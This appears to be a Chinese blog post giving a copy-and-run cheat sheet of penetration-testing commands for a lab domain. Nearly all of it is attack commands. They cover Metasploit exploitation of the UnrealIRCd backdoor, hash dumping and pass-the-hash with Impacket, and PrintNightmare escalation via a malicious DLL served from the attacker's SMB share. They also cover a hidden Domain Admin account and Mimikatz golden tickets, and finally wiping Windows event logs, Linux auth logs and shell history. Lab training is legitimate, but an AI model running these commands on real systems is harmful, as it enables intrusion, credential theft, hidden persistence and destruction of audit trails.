news 2026/7/7 20:28:58

内网渗透靶场实操命令速查表

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透靶场实操命令速查表

本速查表基于之前的Vulhub+Metasploitable 2 靶场实操清单,涵盖从外网突破到持久化的全流程命令,可直接复制执行。

环境说明:攻击机 Kali(192.168.56.101)、跳板机 Metasploitable 2(192.168.56.102)、域控制器(192.168.56.103)、域内主机(192.168.56.104

一、 外网突破:获取跳板机权限

1. 端口扫描与漏洞发现

bash

运行

# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块(msfconsole 内执行) msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run

2. 获取 Meterpreter 会话后基础操作

bash

运行

# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话(返回 msfconsole) background

二、 内网信息收集

1. 内网存活主机探测

bash

运行

# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24 # 手动 ARP 扫描(Kali 本机执行) arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测

2. 域环境信息枚举

bash

运行

# 检测是否存在域(跳板机 shell 内执行) ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户(Kali 执行) python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限(Kali 执行) bloodhound # 启动工具,导入域信息

3. 主机详细信息收集

系统类型核心命令
Windowssysteminfo(系统补丁)netstat -ano(网络连接)tasklist /svc(进程服务)
Linuxuname -a(内核版本)ps -ef(进程)find / -perm -u+s -type f 2>/dev/null(SUID 文件)

三、 横向移动:哈希传递攻击(PTH)

1. 提取目标用户哈希

bash

运行

# Windows 主机哈希提取(Meterpreter 内) run post/windows/gather/hashdump # Linux 主机凭证扫描(跳板机 shell 内) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

2. Impacket PTH 横向移动(Kali 执行)

bash

运行

# 格式:psexec.py 域名/用户名@目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码,直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p P@ssw0rd!

四、 权限提升:PrintNightmare 漏洞利用

1. 攻击机准备恶意 DLL 与 SMB 共享

bash

运行

# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享(供靶机下载 DLL) impacket-smbserver share . -smb2support

2. 靶机执行提权命令(Windows 10 主机 shell 内)

cmd

# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本,获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll

五、 持久化:域内留后门

1. 创建隐藏域管理员账户

cmd

# 在域控制器执行,创建带 $ 隐藏账户 net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain

2. 生成黄金票据(Mimikatz 执行)

bash

运行

# 提取 KRBTGT 账户哈希 mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit # 生成黄金票据(替换 SID 和哈希值) mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit

六、 痕迹清理

1. Windows 日志清理

cmd

# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application

2. Linux 日志清理

bash

运行

# 清空 SSH 登录日志和系统日志 echo "" > /var/log/auth.log echo "" > /var/log/syslog # 清空命令历史记录 history -c && history -w

七、 常用工具命令速查

工具用途命令
Impacket 横向移动python3 wmiexec.py test.com/admin@192.168.56.104 -hashes 哈希值
密码哈希破解john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
端口扫描masscan 192.168.56.0/24 -p 135,445,3389 --rate=1000
提权扫描./PrivescCheck.ps1(Windows)./linpeas.sh(Linux)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 18:08:46

零基础入门学网络安全(详细),看这篇就够了

目录 1.什么是网络安全 1.1 网络安全的定义:1.2 信息系统(Information System)1.3 信息系统安全三要素(CIA)1.4 网络空间安全1.5 国家网络空间安全战略1.6 网络空间关注点1.7 网络空间安全管理流程 2.网络安全术语3.…

作者头像 李华
网站建设 2026/7/7 12:49:54

全网热议!2025年高口碑上海本凡科技小程序开发公司价格TOP3推荐

随着数字化转型的不断推进,上海的小程序开发公司选择越来越多,企业在寻找合适的合作伙伴时,难免会遇到价格参差不齐的情况。为了帮助企业快速了解市场状况,本文将介绍2025年高口碑的三家小程序开发公司,从多方面进行综…

作者头像 李华
网站建设 2026/7/7 6:53:20

如何为超宽屏显示器选择 KVM 切换器?

引言: 随着超宽屏显示器因其卓越的视觉体验和高效性而获得广泛认可,越来越多的用户选择用这种宽广的屏幕替代传统的双显示器方案。然而,超宽屏与 KVM 切换器的兼容性是一个特殊的挑战。并非所有 KVM 切换器,即使拥有正确的接口类型…

作者头像 李华
网站建设 2026/7/7 11:32:08

无感刷新Token全攻略:实现用户“永不掉线”的极致体验

无感刷新Token全攻略:实现用户“永不掉线”的极致体验 想象一下,用户正沉浸在购物车结算的最后一步,却突然被弹回登录页面——这种体验糟透了。本文将彻底解决这个问题。 1. 引言:为什么需要无感刷新Token? 在基于Token的Web认证体系中,Access Token(访问令牌)通常有较…

作者头像 李华